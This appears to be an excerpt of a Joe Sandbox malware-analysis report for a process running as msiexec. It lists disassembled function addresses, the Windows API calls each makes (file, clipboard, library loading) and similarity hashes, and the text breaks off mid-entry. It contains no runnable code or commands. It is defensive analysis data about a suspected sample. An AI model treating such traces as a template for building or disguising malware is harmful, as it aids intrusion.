                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                    Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                    Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                    Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                    Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                    Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                    • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                    Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3655998216-0
                                                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                    Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1828521557-0
                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                    Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 609303285-0
                                                                                                    • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                    • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2136311172-0
                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                    Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1936579350-0
                                                                                                    • Opcode ID: cef582a9a494f53343386042733aa5513809ed917381c834d5c32100c32837aa
                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                    • Opcode Fuzzy Hash: cef582a9a494f53343386042733aa5513809ed917381c834d5c32100c32837aa
                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                    Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                    • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                    Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                    • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                    Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 0c5a0888377c0e205cb66d2f0871631587e8edd28856d65f4255f3fbdd23c7c5
                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                    • Opcode Fuzzy Hash: 0c5a0888377c0e205cb66d2f0871631587e8edd28856d65f4255f3fbdd23c7c5
                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                    Non-executed Functions

                                                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1213725291-0
                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
